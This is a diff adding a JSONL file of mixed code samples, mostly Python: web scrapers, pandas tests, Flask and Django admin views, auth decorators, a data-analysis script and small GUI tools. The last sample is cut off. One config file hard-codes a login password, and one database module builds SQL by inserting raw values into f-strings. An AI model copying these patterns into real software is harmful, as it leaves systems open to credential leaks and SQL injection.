diff --git "a/4064.jsonl" "b/4064.jsonl" new file mode 100644--- /dev/null +++ "b/4064.jsonl" @@ -0,0 +1,616 @@ +{"seq_id":"228824175","text":"#This uses urlopen to access a site, then uses BeautifulSoup to get the\n#HTML from that site, and then cuts out all of the non-text\nimport re\nfrom bs4 import BeautifulSoup\nimport requests\n\nclass Professor:\n person = \"\"\n quality = \"\"\n takeAgain = \"\"\n difficulty = \"\"\n def __init__(self, name):\n self.person = name\n\ndef isPageGood(url):\n site = requests.get(url)\n soup = BeautifulSoup(site.content, \"html.parser\")\n zeroMatches = soup.find(\"div\", attrs ={\"class\" : \"zeromatches\"}) #if page is bad the find() will return \"

No course sections matched your search criteria.

Please try again using fewer or different search terms.

\"\n\n badString = '

No course sections matched your search criteria.

Please try again using fewer or different search terms.

'\n\n #tests to see if there is string denoting no results is in the page\n if badString in str(zeroMatches) :\n return False\n else:\n return True\n\ndef abSem(semester) : #abbreviates the semester value to get the whole term ----returns the one letter abbreviation\n if semester.lower() == \"fall\":\n return \"f\"\n elif semester.lower() == \"spring\":\n return \"s\"\n elif semester.lower() == \"summer\":\n return \"u\"\n else :\n return \"And the Lord spake, saying, 'First shalt thou take out the Holy Pin. Then, shalt thou count to three, no more, no less. Three shall be the number thou shalt count, and the number of the counting shall be three. Four shalt thou not count, nor either count thou two, excepting that thou then proceed to three. Five is right out! Once the number three, being the third number, be reached, then lobbest thou thy Holy Hand Grenade of Antioch towards thou foe, who being naughty in my sight, shall snuff it.'\"\n\ndef createURL(prefix,year,semester,number) : #navigates to the coursebook page with the search criteria and returns creates a list of all the professors\n term = str(year%100) + abSem(semester=semester)\n url = \"https://coursebook.utdallas.edu/search/searchresults\" + \"/\" + prefix + str(number) + \"/term_\" + term\n\n return url\n\ndef scrapeProf(url) : #navigates to the coursebook page with the search criteria and returns creates a list of all the professors\n site = requests.get(url)\n soup = BeautifulSoup(site.content, \"html.parser\")\n professorList = soup.find_all(\"a\", title=True, attrs ={\"class\" : \"ptools-popover\"})\n\n i = 0\n while i < len(professorList): #changes the professor list full of jank into just the names\n professorList[i] = professorList[i].get_text()\n if (professorList[i].count(\" \") + 1) >= 2 : #if wordcount >=2\n professorList[i] = professorList[i].split()[0] + \" \" + professorList[i].split()[-1]\n i = i + 1\n return professorList\n\ndef getRating(name):\n\n name = re.sub('\\s','+',name)\n professor = Professor(name)\n #Initial Search for the Professor\n URL = \"https://www.ratemyprofessors.com/search.jsp?queryoption=HEADER&queryBy=teacherName&schoolName=The+University+of+Texas+at+Dallas&schoolID=1273&query=\" + name\n site = requests.get(URL)\n soup = BeautifulSoup(site.content, 'html.parser')\n search = soup.find(\"a\", href=re.compile(\"ShowRatings\"))\n \n if str(search) == \"None\":\n professor.quality = \"0\"\n professor.takeAgain = \"0\"\n professor.difficulty = \"0\"\n print(\"Professor was not found\")\n else:\n\n URL = \"https://www.ratemyprofessors.com\" + search.get('href') # new link\n \n \n #Get Number from the actual professor page.\n site = requests.get(URL)\n soup = BeautifulSoup(site.content, 'html.parser')\n search = soup.find_all('div', attrs={'class':'grade'})\n\n if len(search) == 3:\n \n quality = search[0].get_text()\n takeAgain = search[1].get_text()\n difficulty = search[2].get_text()\n\n professor.quality = re.sub('\\s+','',quality)\n professor.takeAgain = re.sub('\\s+','',takeAgain)\n professor.difficulty = re.sub('\\s+','',difficulty)\n\n else:\n\n professor.quality = \"0\"\n professor.takeAgain = \"0\"\n professor.difficulty = \"0\"\n\n\n return professor\n\ndef getRatingList(professorList):\n index = 0\n ratingList = []\n for professor in professorList:\n name = professorList[index]\n ratingList.append(getRating(name))\n index += 1\n return ratingList\n\n\ndef compProf(ratingList):\n index = 0\n bestIndex = 0\n bestQuality = 0.0\n\n for professor in ratingList:\n string = 
ratingList[index].quality\n quality = float(string)\n if quality > bestQuality:\n bestQuality = quality\n bestIndex = index\n index += 1\n \n return ratingList[bestIndex]\n\n\ndef bestProfessor(coursePrefix, courseNum, semester, year):\n searchUrl = createURL(coursePrefix, year, semester, courseNum)\n if isPageGood(searchUrl):\n professor = compProf(getRatingList(scrapeProf(searchUrl)))\n print(professor.person)\n print(professor.quality)\n print(professor.difficulty)\n print(professor.takeAgain)\n return \n else:\n return None\n\nbestProfessor(\"cs\", 6301, \"spring\", 2020)\n\n#absem\n#create url\n#scrap prof to array\n#for each prof in array get rating and output to new array\n#find top prof and return prof\n","sub_path":"Payton Testing/scrape.py","file_name":"scrape.py","file_ext":"py","file_size_in_byte":5444,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"89822978","text":"import pytest\nfrom hypothesis import given\n\nfrom janitor.testing_utils.strategies import df_strategy\n\n\n@pytest.mark.functions\n@given(df=df_strategy())\ndef test_reorder_columns(df):\n # NOTE: This test essentially has four different tests underneath it.\n # WE should be able to refactor this using pytest.mark.parametrize.\n\n # sanity checking of inputs\n\n # input is not a list or pd.Index\n with pytest.raises(TypeError):\n df.reorder_columns(\"a\")\n\n # one of the columns is not present in the DataFrame\n with pytest.raises(IndexError):\n df.reorder_columns([\"notpresent\"])\n\n # reordering functionality\n\n # sanity check when desired order matches current order\n # this also tests whether the function can take Pandas Index objects\n assert all(df.reorder_columns(df.columns).columns == df.columns)\n\n # when columns are list & not all columns of DataFrame are included\n assert all(\n df.reorder_columns([\"animals@#$%^\", \"Bell__Chart\"]).columns\n == [\"animals@#$%^\", \"Bell__Chart\", \"a\", \"decorated-elephant\", \"cities\"]\n )\n","sub_path":"tests/functions/test_reorder_columns.py","file_name":"test_reorder_columns.py","file_ext":"py","file_size_in_byte":1081,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"29977213","text":"# -*- coding: utf-8 -*-\n\nimport os\nimport socket \n\ndef get_host():\n\treturn socket.gethostbyname(socket.gethostname())\n\n\n# 本设备IP\n# LOCAL_MACHINE_IP = get_host()\nLOCAL_MACHINE_IP = '10.1.1.20'\n\n# 设备名 (用于告诉用户哪台设备接单执行打包任务)\nMACHINE_NAME = 'MacPro'\n\n# 本地登录用户名\nLOCAL_USERNAME = 'babybus'\n\n# 本地登录用户密码\nLOCAL_PASSWORD = 'team123456'\n\n# 打包系统代码逻辑路径\nSITES_DIR = r'/Users/babybus/Sites'\n\n# 模板插件等代码资源路径\nSITE_DIR = r'/Volumes/BABYBUS_2D/Site'\n\n# 打包数据缓存和公共资源等路径\nMEDIA_DIR = r'/Volumes/BabyBusData/htdocs/media'\n\n\n# APP打包资源缓存路径\nTEMP_DIR = os.path.join(MEDIA_DIR, 'temp')\n\n# 用于存放对比的音效资源\nSND_SOURCE_DIR = os.path.join(MEDIA_DIR, 'sndsource')\n\n# 用于存放不同功能的lua模板的路径(2.x框架)\nPROJECT_TOOL_DIR = os.path.join(SITE_DIR, 'project_tool')\n\n# 用于存放不同功能的lua模板的路径(3.x框架)\nTHREE_TOOL_DIR = os.path.join(SITE_DIR, 'three_tool')\n\n# 用于存放安卓和IOS模板的路径\nSOURCE_DIR = os.path.join(SITE_DIR, 'source')\n\n# 用于获取IOS打包模板的路径\nIPAPACK_DIR = os.path.join(SOURCE_DIR, 'ipapack')\n\n# 用于反馈到网站打包日志的路径\nMEDIA_PORT = os.path.join(LOCAL_MACHINE_IP, 'media')\n\n# 网站上传的公共资源路径 \nCOMMON_RES_DIR = os.path.join(SITES_DIR, 'media', 'common')\n\n\n# add a005 a030 等渠道统一处理\nSAME_CHANNEL = ['A005', 
'A030']\n","sub_path":"quick/python/django/pack/auxiliary/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":1489,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"388876041","text":"# -*- coding: utf-8 -*-\n\nfrom apps.gift.models import Category, Subcategory, Gift, Brand,\\\n GlobalPriceModif\nfrom apps.gift.forms import SubcategoryForm, CategoryForm, GiftForm,\\\n AddNewThumb, BrandForm, GlobalPriceModifForm\nfrom kay.utils import render_to_response\nfrom kay.auth.decorators import admin_required\nfrom kay.lib.werkzeug.utils import redirect\nfrom apps.img.models import ThumbImage\nfrom kay.utils.paginator import Paginator, InvalidPage, EmptyPage\n\n\n@admin_required\ndef all(request):\n gifts_list = Gift.all()\n paginator = Paginator(gifts_list, 26)\n try:\n page = int(request.args.get('page',1))\n except ValueError:\n page = 1\n\n try:\n gifts = paginator.page(page)\n except (EmptyPage, InvalidPage):\n gifts = paginator.page(paginator.num_pages())\n\n return render_to_response('gift/admin/all.html', {'gifts':gifts})\n\n@admin_required\ndef delete(request, key):\n gift = Gift.get(key)\n if gift:\n gift.delete()\n return redirect('/gift/admin/all/')\n\n\n@admin_required\ndef add(request):\n tmp_gift = Gift()\n form = GiftForm(instance=tmp_gift)\n if request.method == 'POST' and form.validate(request.form):\n gift = form.save()\n return redirect('/gift/admin/edit/%s/' % gift.key())\n return render_to_response('gift/admin/add.html', {'form':form.as_widget()})\n\n@admin_required\ndef edit(request, key):\n ret_url = request.values.get('ret_url', '')\n gift = Gift.get(key)\n if gift is None:\n return redirect('/gift/admin/all/')\n edit_form = GiftForm(instance=gift)\n if request.method == 'POST' and edit_form.validate(request.form):\n edit_form.save()\n if ret_url:\n return redirect(ret_url)\n return redirect('/gift/admin/all/')\n add_new_thumb_form = AddNewThumb()\n return render_to_response('gift/admin/edit.html',\n {'edit_form':edit_form.as_widget(),\n 'gift':gift,\n 'add_new_thumb_form':add_new_thumb_form.as_widget()})\n\n@admin_required\ndef brands(request):\n form = BrandForm()\n if request.method == \"POST\":\n if form.validate(request.form):\n form.save()\n form = BrandForm()\n return render_to_response('gift/admin/brands.html',\n {'form':form.as_widget(), 'brands':Brand.all()})\n\n@admin_required\ndef brand_edit(request, key):\n brand = Brand.get(key)\n if brand is None:\n return redirect('/gift/admin/brands/')\n form = BrandForm(instance=brand)\n if request.method == 'POST' and form.validate(request.form):\n form.save()\n return redirect('/gift/admin/brands/')\n return render_to_response('gift/admin/brand_edit.html', {'form':form.as_widget()})\n\n@admin_required\ndef categories(request):\n form = CategoryForm()\n if request.method == 'POST':\n if form.validate(request.form):\n form.save()\n form = CategoryForm()\n return render_to_response('gift/admin/category.html',\n {'form':form.as_widget(),\n 'categories':Category.all().order('category')})\n\n@admin_required\ndef subcategories(request):\n form = SubcategoryForm()\n if request.method == 'POST':\n if form.validate(request.form):\n form.save()\n form = SubcategoryForm()\n return render_to_response('gift/admin/subcategories.html',\n {'form':form.as_widget(),\n 'subcategories':Subcategory.all()\\\n .order('on_category').order('subcategory')})\n\n@admin_required\ndef global_price_modif(request):\n form = GlobalPriceModifForm()\n if request.method == 'POST':\n 
if form.validate(request.form):\n objs = GlobalPriceModif.all()\n if objs.count() > 0:\n gpm = objs[0]\n gpm.price_percent = form['price_percent']\n gpm.put()\n return redirect('/gift/admin/global_price_modif')\n else:\n form.save()\n form = GlobalPriceModifForm()\n return render_to_response('gift/admin/global_price_modif.html',\n {'form':form.as_widget(),\n 'global_price_modif':GlobalPriceModif.all()})\n\n@admin_required\ndef delete_brand(request, key):\n brand = Brand.get(key)\n if brand:\n brand.delete()\n return redirect('/gift/admin/brands/')\n\n@admin_required\ndef delete_category(request, key):\n category = Category.get(key)\n if category:\n category.delete()\n return redirect('/gift/admin/categories/')\n\n@admin_required\ndef delete_subcategory(request, key):\n subcategory = Subcategory.get(key)\n if subcategory:\n subcategory.delete()\n return redirect('/gift/admin/subcategories/')\n\n@admin_required\ndef add_new_thumb(request):\n if request.method == 'POST':\n gift_key = request.values.get('gift_key')\n gift = Gift.get(gift_key)\n if gift is None:\n return redirect('/gift/admin/edit/%s/' % gift_key)\n\n new_th_form = AddNewThumb()\n if request.form and new_th_form.validate(request.form, request.files):\n thumb = new_th_form['img']\n content_type = 'image/jpeg'\n if gift.name:\n title = gift.name.replace('\"', '"')\n else:\n title = ''\n thumb_img = ThumbImage()\n thumb_img.add_new_thumb(blob_img=thumb, thumb_size=(700, 700, ),\n title=title, content_type=content_type)\n thumb_img.add_new_thumb(blob_img=thumb, thumb_size=(400, 400, ),\n title=title, content_type=content_type)\n thumb_img.add_new_thumb(blob_img=thumb, thumb_size=(200, 200, ),\n title=title, content_type=content_type)\n thumb_img.add_new_thumb(blob_img=thumb, thumb_size=(100, 100, ),\n title=title, content_type=content_type)\n if not gift.thumbs.count():\n thumb_img.main_gift = gift\n thumb_img.gift = gift\n thumb_img.put()\n\n return redirect('/gift/admin/edit/%s/' % gift_key)\n return redirect('/gift/admin/all/')\n\n@admin_required\ndef set_default_thumb(request, gift, key):\n thumb = ThumbImage.get(key)\n if thumb:\n gift_obj = Gift.get(gift)\n if gift_obj:\n if gift_obj.main_thumb.count():\n for old_thumb in gift_obj.main_thumb:\n old_thumb.main_gift = None\n old_thumb.put()\n thumb.main_gift = gift_obj\n thumb.put()\n return redirect('/gift/admin/edit/%s/' % gift)\n\n@admin_required\ndef delete_thumb(request, thumb_key):\n thumb = ThumbImage.get(thumb_key)\n if thumb:\n gift = thumb.gift\n thumb.delete()\n if gift.thumbs.count() and not gift.main_thumb.count():\n tmp_thumb = gift.thumbs[0]\n tmp_thumb.main_gift = gift\n tmp_thumb.put()\n return redirect('/gift/admin/edit/%s/' % gift.key())\n return redirect('/admin/view_all/')\n\n\n","sub_path":"apps/gift/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":7026,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"197968685","text":"import functools\nfrom flask import g, request\nfrom flask_jwt_extended import verify_jwt_in_request\nfrom flask_appbuilder.security.decorators import has_access\nimport simplejson as json\nfrom superset import security_manager\nfrom superset.peak import authorizer\n\ndef has_superset_api_access(f):\n \"\"\"\n Use this decorator for REST APIs in order to authenticate via superset generated\n access_token. 
It will enable granular security permissions to your methods.\n Permissions will be associated to a role, and roles are associated to users.\n\n By default the permission's name is the methods name.\n \"\"\"\n def wraps(self, *args, **kwargs):\n try:\n if request.headers.get('Authorization') is not None:\n verify_jwt_in_request()\n return f(self, *args, **kwargs)\n elif g.user is not None and g.user.is_authenticated:\n has_access(f)\n return f(self, *args, **kwargs)\n else:\n raise Exception('Login is valid only through \"authToken\"')\n except Exception as e:\n raise e\n return functools.update_wrapper(wraps, f)\n\ndef check_access_and_create_session(f):\n \"\"\"\n Use this decorator to enable granular security permissions to your methods\n and for login user using sessions. Permissions will be associated to a role,\n and roles are associated to users.\n\n By default the permission's name is the methods name.\n \"\"\"\n def wraps(self, *args, **kwargs):\n try:\n form_data = request.args.get('form_data')\n if form_data is None:\n form_data = \"{}\"\n auth_token = json.loads(form_data).get(\"token\")\n authorization_header = request.headers.get('Authorization')\n\n if (authorization_header is not None or auth_token is not None):\n token = authorization_header\n if token is None:\n token = \"Bearer \" + auth_token\n authorizer.authorize(token, security_manager)\n return f(self, *args, **kwargs)\n elif g.user is not None and g.user.is_authenticated:\n has_access(f)\n return f(self, *args, **kwargs)\n else:\n raise Exception('Login is valid only through \"authToken\"')\n except Exception as e:\n raise e\n return functools.update_wrapper(wraps, f)\n","sub_path":"superset/peak/decorators.py","file_name":"decorators.py","file_ext":"py","file_size_in_byte":2421,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"7457954","text":"#!/usr/bin/env python\n\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport sys\nimport re\nimport math\nimport scipy.stats as stats\n\n\n# sys.argv[1] : csv file to extract columns from\n\n\ndata = pd.read_csv(sys.argv[1], sep=',', engine=\"python\")\ndata = data[data.RBPome != 'Contaminant']\ndata = data.fillna('-')\n\ntot_pfam = list()\n\nfor i in range(len(data)):\n a = list()\n pfam = data.iloc[i]['Cross-reference_(Pfam)']\n pfam = pfam.split(';')\n\n for j in range(len(pfam)):\n if pfam[j][:2] == 'PF':\n a.append(pfam[j])\n\n a = list(set(a))\n\n for j in range(len(a)):\n tot_pfam.append(a[j])\n\nprint(len(tot_pfam))\n\nnew = pd.DataFrame({'pfam': tot_pfam})\nnew['RBD_classification'] = ''\nnew['name'] = ''\n\npfam_dom = pd.read_csv(sys.argv[2], sep=',', engine='python')\n\ndic_class = pfam_dom[['id', 'RBD.classification']]\ndic_class = dic_class.set_index('id').T.to_dict('list')\n\ndic_name = pfam_dom[['id', 'name']]\ndic_name = dic_name.set_index('id').T.to_dict('list')\n\nfor i in range(len(new)):\n new.at[i, 'RBD_classification'] = str(dic_class.get(new.iloc[i]['pfam']))[2:-2]\n new.at[i, 'name'] = str(dic_name.get(new.iloc[i]['pfam']))[2:-2]\n\n\nnew.to_csv('sample_pfam_with_class.csv', index=None)\n\n# sorting out classical RBD\n\n\nclassical = new[new.RBD_classification == 'classical']\n\na = classical['name'].value_counts()\na = a.to_frame()\na['id'] = a.index\na.index = range(len(a))\n\nkh_counter = 0\n\nclassical = pd.DataFrame()\nclassical['count'] = ''\nclassical['name'] = ''\n\nfor i in range(len(a)):\n if str(a.iloc[i]['id'])[:3] == \"KH_\":\n 
kh_counter = kh_counter + int(a.iloc[i]['name'])\n \n else:\n classical.at[i, 'name'] = a.iloc[i]['id']\n classical.at[i, 'count'] = a.iloc[i]['name']\n\nclassical.index = range(len(classical))\nclassical.at[len(classical), 'name'] = 'KH'\nclassical.at[len(classical)-1, 'count'] = kh_counter\n\n# sorting out non classical RBD\n\n\nnonclassical = new[new.RBD_classification == 'nonclassical']\n\nb = nonclassical['name'].value_counts()\nb = b.to_frame()\nb['id'] = b.index\nb.index = range(len(b))\n\nribosome_counter = 0\n\nnonclassical = pd.DataFrame()\nnonclassical['count'] = ''\nnonclassical['name'] = ''\n\nfor i in range(len(b)):\n if str(b.iloc[i]['id'])[:9] == 'Ribosomal':\n ribosome_counter = ribosome_counter + int(b.iloc[i]['name'])\n\n else:\n nonclassical.at[i, 'name'] = b.iloc[i]['id']\n nonclassical.at[i, 'count'] = b.iloc[i]['name']\n\nnonclassical.index = range(len(nonclassical))\nnonclassical.at[len(nonclassical), 'name'] = 'Ribosomal'\nnonclassical.at[len(nonclassical)-1, 'count'] = ribosome_counter\n\n\nnone = new[new.RBD_classification == 'none']\n\nc = none['name'].value_counts()\nc = c.to_frame()\nc['id'] = c.index\nc.index = range(len(c))\n\nrna_c = 0\nppr_c = 0\nfad_c = 0\n\nnone = pd.DataFrame()\nnone['count'] = ''\nnone['name'] = ''\n\nfor i in range(len(c)):\n if str(c.iloc[i]['id'])[:11] == 'RNA_pol_Rpb':\n rna_c = rna_c + int(c.iloc[i]['name'])\n\n elif str(c.iloc[i]['id'])[:4] == 'PPR_':\n ppr_c = ppr_c + int(c.iloc[i]['name'])\n\n elif str(c.iloc[i]['id'])[:12] == 'FAD_binding_':\n fad_c = fad_c + int(c.iloc[i]['name'])\n\n else:\n none.at[i, 'name'] = c.iloc[i]['id']\n none.at[i, 'count'] = c.iloc[i]['name']\n\nnone.index = range(len(none))\nnone.at[len(none), 'name'] = 'RNA_pol_Rpb'\nnone.at[len(none)-1, 'count'] = rna_c\n\nnone.at[len(none), 'name'] = 'PPR_none'\nnone.at[len(none)-1, 'count'] = ppr_c\n\nnone.at[len(none), 'name'] = 'FAD_binding'\nnone.at[len(none)-1, 'count'] = fad_c\n\nrandom = new[new.RBD_classification == '']\n\n\nclassical.to_csv('classical_rbp.csv', index=None)\nnonclassical.to_csv('nonclassical_rbp.csv', index=None)\nnone.to_csv('none_rbp.csv', index=None)\nrandom.to_csv('no_entry.csv', index=None)\n\n\n\nd = random['RBD_classification'].value_counts()\n\n\n\n\n'''\na.to_csv('classical_rbp.csv')\nb.to_csv('nonclassical_rbp.csv')\nc.to_csv('none.csv')\nd.to_csv('random.csv')\n'''\n\n\n\n'''\nnone = occ[['none'][0]]\n\nclassical = occ[['classical'][0]]\nnonclassical = occ[['nonclassical'][0]]\n\nbar_chart = [classical, nonclassical, none]\n\nfig, ax = plt.subplots(figsize=(10,7))\n\ncolors = [\"#006D2C\", \"#31A354\",\"#74C476\"]\n\nocc.plot.bar(stacked = True, colors = colors)\n'''\n\n\n'''\nfig = plt.figure(facecolor='white')\n\nax = fig.add_subplot(1,1,1)\nbar_width = 0.5\nbar_1 = np.arrange(1,4)\n\nax1 = ax.bar(bar_1, bar_chart, width = bar_width, label = 'A', \n\n'''\n'''\ndata['odds_ratio'] = ''\ndata['log2_odds_ratio'] = ''\n\ndata.index = range(len(data))\n\nfor i in range(len(data)):\n\n print(i)\n print('-----------------')\n print(data.iloc[i]['name'])\n print('-----------------')\n\n# if data.iloc[i]['# GO'] == 'GO:0004673':\n# print(data[[i]])\n\n\n\n study = data.iloc[i]['ratio_in_study']\n pop = data.iloc[i]['ratio_in_pop']\n\n study = study.split('/')\n pop = pop.split('/')\n study = list(map(float, study))\n pop = list(map(float, pop))\n odds_ratio = (study[0]/study[1])/(pop[0]/pop[1])\n\n if odds_ratio != 0:\n log2_odds_ratio = math.log2(odds_ratio)\n data.at[i, 'odds_ratio'] = str(odds_ratio)\n data.at[i, 
'log2_odds_ratio'] = str(log2_odds_ratio)\n\n\n elif odds_ratio == 0:\n log2_odds_ratio = 'error'\n\n\n# print(odds_ratio)\n# print(log2_odds_ratio)\n# print('data frame before: ',repr(new.iloc[i]['odds_ratio']))\n# print('or: ',repr(odds_ratio))\n# print('log2: ',log2_odds_ratio)\n\n# print('data frame after: ', new.iloc[i]['odds_ratio'])\n\n# print(data.iloc[i]['name'], ' has odds_ratio: ', odds_ratio)\n\ndata.to_csv('at_GO_enrichment_no_propagate_odds_ratio.csv', index=None)\n\n\n'''\n\n\n\n\n'''\nnew = pd.DataFrame(columns=['Entry'])\nnew['Entry'] = ''\n\nsample_list = list()\nempty = list()\nempty_counter = 0\n\nfor i in range(len(data)):\n if i%1000 == 0:\n print(str(i) + '/' + str(len(data)))\n\n prot_groups = data.iloc[i]['Entry']\n prot_groups = prot_groups.split(';')\n \n for l in range(len(prot_groups)):\n if prot_groups[l] != '-':\n sample_list.append(prot_groups[l])\n \n\n elif prot_groups[l] == '-':\n empty.append(str(data.iloc[i]['Majority.protein.IDs']))\n empty_counter += 1\n\n\n\n# go = data.iloc[i]['Gene_ontology_(molecular_function)']\n# go = go.split(';')\n# go_new = list()\n# for j in range(len(go)):\n# if go[j][1:3] == 'GO':\n# go_new.append(go[j][1:-1])\n\n# if len(go_new) != 0: \n# new.at[i, 'Gene_ontology_(molecular_function)'] = go_new\n\n\nprint('these groups did not have an identifier: ' + str(empty))\nprint('they were : ' + str(empty_counter) + ' in total')\n\nsamples = list(set(sample_list))\n\nthefile = open('at_sample_proteins.csv', 'w')\nfor item in samples:\n thefile.write(\"%s\\n\" % item)\n\nprint(len(sample_list))\nprint(len(samples))\n\n#new.to_csv('at_sample_prot_file.csv', sep='\\t', index=None, header=False)\n'''\n","sub_path":"pfam_domain_distribution.py","file_name":"pfam_domain_distribution.py","file_ext":"py","file_size_in_byte":6913,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"653198422","text":"from models.config import connection\n\n\ndef insert_task(grade, day, hour, date, descr):\n curr_id = get_current_task_id()\n with connection.cursor() as cursor:\n query = f\"insert into task values (Null, '{grade}', {day}, '{hour}', '{date}', '{descr}');\"\n cursor.execute(query)\n connection.commit()\n print(\"inserted\")\n insert_student_task(grade, curr_id)\n\n\ndef get_current_task_id():\n with connection.cursor() as cursor:\n query = \"SELECT `AUTO_INCREMENT` FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA = 'homeschooldb' AND TABLE_NAME = 'task';\"\n cursor.execute(query)\n result = cursor.fetchall()\n print(result)\n return result[0]['AUTO_INCREMENT']\n\n\ndef get_tasks_by_class_and_date(class_, date):\n with connection.cursor() as cursor:\n query = \"select homework from lesson where class = '{}' and date = {}\".format(class_, date)\n cursor.execute(query)\n tasks = cursor.fetchall()\n return tasks\n\n\ndef get_all_students(class_):\n with connection.cursor() as cursor:\n query = f\"select name_ from student where class = '{class_}'\"\n cursor.execute(query)\n students = cursor.fetchall()\n return students\n\n\ndef insert_student_task(class_, task_id):\n students = get_all_students(class_)\n with connection.cursor() as cursor:\n for student in students:\n query = f\"insert into student_task values('{student['name_']}', {task_id}, 0)\"\n cursor.execute(query)\n connection.commit()\n print(\"insert 
students\")\n","sub_path":"models/upload_task_model.py","file_name":"upload_task_model.py","file_ext":"py","file_size_in_byte":1570,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"314118231","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom django.views.generic import TemplateView\nfrom django.views.generic import ListView\nfrom django.views.generic import DetailView\nfrom el_pagination.views import AjaxListView\n\nfrom gitensite.apps.bookrepos.models import BookRepo\nfrom gitensite.apps.bookinfo.models import Book\n\nclass HomePageView(TemplateView):\n template_name = 'home.html'\n\n def get_context_data(self, **kwargs):\n context = super(HomePageView, self).get_context_data(**kwargs)\n return context\n\nclass NewsletterView(TemplateView):\n\n def get_template_names(self, **kwargs):\n return ['newsletters/{issue}.html'.format(\n issue=str(self.kwargs['issue'])\n )]\n\nclass SearchView(AjaxListView):\n model = Book\n template_name = 'book_list.html'\n page_template = 'book_list_page.html'\n\n def get_context_data(self, **kwargs):\n context = super(SearchView, self).get_context_data(**kwargs)\n\n return context\n\n def get_queryset(self):\n if self.request.GET.has_key('q'):\n return super(AjaxListView,self).get_queryset().filter(title__icontains=self.request.GET['q'])\n else:\n return super(AjaxListView,self).get_queryset()\n","sub_path":"gitensite/apps/content/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1245,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"638801554","text":"#!/usr/bin/python\nimport os\nimport shutil\nimport tkinter as tk\n\ngui = tk.Tk()\n\ngui.text = tk.StringVar()\ngui.text.set(\"Click the \\\"Execute Fix\\\" to continue...\")\n\n\ndef getmodfolder():\n return (\n os.path.dirname(\n os.getenv('APPDATA')\n ) + \"\\\\Local\\\\Introversion\\\\Prison Architect\\\\mods\\\\2611379081\"\n )\n\n\ndef copytree(src, dst, symlinks=False, ignore=None):\n for item in os.listdir(src):\n s = os.path.join(src, item)\n d = os.path.join(dst, item)\n if os.path.isdir(s):\n shutil.copytree(s, d, symlinks, ignore)\n else:\n shutil.copy2(s, d)\n\n\ndef center(win):\n win.update_idletasks()\n width = win.winfo_width()\n height = win.winfo_height()\n x = (win.winfo_screenwidth() // 2) - (width // 2)\n y = (win.winfo_screenheight() // 2) - (height // 2)\n win.geometry('{}x{}+{}+{}'.format(width, height, x, y))\n\n\nnewDir = os.path.dirname(\n os.getenv('APPDATA')\n ) + \"\\\\Local\\\\Introversion\\\\Prison Architect\\\\mods\\\\CTM_Mod_Fixed\"\n\n\ndef callback():\n gui.text.set(\"Fixing mod...\")\n if os.path.isdir(getmodfolder()) and not os.path.exists(newDir):\n # Found the mod folder\n os.makedirs(newDir)\n copytree(getmodfolder(), newDir)\n\n # Now, we're going to open the manifest and delete the FileID.\n manifest = open(newDir + \"/\" + \"manifest.txt\")\n lines = manifest.readlines()\n # Close the file.\n manifest.close()\n # Reopen in write mode\n manifest = open(newDir + \"/\" + \"manifest.txt\", \"w\")\n for line in lines:\n if line != \"FileID F261379081\"+\"\\n\":\n if \"Name\" in line:\n manifest.write(\"Name \\\"CTM Fixed\\\"\" + \"\\n\")\n else:\n manifest.write(line)\n # And close it once more\n manifest.close()\n gui.text.set(\"Fix complete!\")\n else:\n if not os.path.isdir(getmodfolder()):\n gui.text.set(\"Unable to locate mod folder. 
Are you subscribed to CTM?\")\n else:\n gui.text.set(\"You already applied the fix!\")\n\n\ndef close():\n gui.quit()\n\ngui.geometry(\"375x25\")\ngui.wm_title(\"Creative Grant Mod Fixer\")\ncenter(gui)\n\n# Now, we're going to add our widgets...\nbtn_1 = tk.Button(gui, text=\"Execute Fix\", command=callback).pack(side=\"left\")\nbtn_2 = tk.Button(gui, text=\"Close\", command=close).pack(side=\"left\")\n\nlbl_1 = tk.Label(gui, textvariable=gui.text).pack()\n\ngui.mainloop()","sub_path":"out/CTMFixer.py","file_name":"CTMFixer.py","file_ext":"py","file_size_in_byte":2501,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"314033244","text":"import hailtop.batch as hb \n\nbackend = hb.ServiceBackend(\n billing_project='leonhardgruenschloss-trial',\n bucket='leo-tmp-au')\n\nb = hb.Batch(backend=backend, name='inner') \n\nj = b.new_job(name='hello') \nj.command('echo \"hello world\"') \n\nb.run()\n","sub_path":"inner.py","file_name":"inner.py","file_ext":"py","file_size_in_byte":251,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"444970995","text":"#!/usr/bin/python\r\n\r\n# Comment start with #\r\n# No multiple line comment\r\n\r\n##-----------------------------------------------------------------------------\r\n# Access options (Button=btnName)\r\n# btnName['state']=DISABLE/NORMAL\r\n# btnName['text']=\"Name of Button\"\r\n\r\n\r\n\r\nimport tkinter as tk\r\nfrom tkinter import messagebox as msgBox #import tkMessageBox\r\n\r\ntop = tk.Tk()\r\ntop.title('Button widget')\r\ntop.geometry('400x200')\r\n\r\ndef helloCallBack():\r\n msgBox.showinfo (\"Title Python\", \"Message : Hello\")\r\n print ('state : ', btnHello['state'])\r\n print ('text :', btnHello['text'])\r\n\r\ndef InfoCallBack():\r\n msgBox.showinfo (\"Information\", \"This is info Only\")\r\n\r\ncolorBG = \"#0000f0\" # notice color must be 6 hex digits (#123abc)\r\nbtnHello = tk.Button (top, text = \"Hello\", command = helloCallBack, fg=\"gray\", 